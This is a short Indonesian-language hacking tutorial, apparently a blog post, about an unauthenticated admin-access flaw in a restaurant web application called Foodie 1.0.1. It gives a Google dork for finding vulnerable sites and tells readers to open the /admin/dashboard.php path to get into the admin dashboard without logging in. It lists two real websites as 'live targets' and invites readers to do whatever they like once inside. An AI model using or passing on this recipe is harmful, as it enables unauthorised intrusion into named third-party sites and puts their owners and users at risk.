Yow halo exploiter, kali ini saya akan membagikan sebuah tutorial lagi, sesuai judul tutorial kali ini adalah Foodie 1.0.1 Unauthorized Administrative Access ya sedikit penjelasan aja mengenai vulnerability kali ini, jadi kalian bisa mengakses dashboard admin tanpa harus menggunakan alat no redirect atau apapun itu. ya langsung aja ke tutorialnya
Dork : inurl:restaurants_details.php?id= ( kembangin sendiri )
Tutorial :
1. dorking di google menggunakan dork yang sudah saya sediakan atau bisa kembangin lagi
2. jika sudah menemukan target contoh disini target saya adalah https://foodie.com.np/restaurants_details.php?id=9851033853
3. setelah itu masukkan payload /admin/dashboard.php pada akhir ekstensi domain, jadinya seperti ini : https://foodie.com.np/admin/dashboard.php
4. dan jika "vuln" maka kalian akan langsung masuk ke dalam dashboard seperti gambar dibawah ini
5. selanjutnya terserah kalian mau di apakan :b
live target :
- http://www.maulikbazar.com/
- https://foodie.com.np/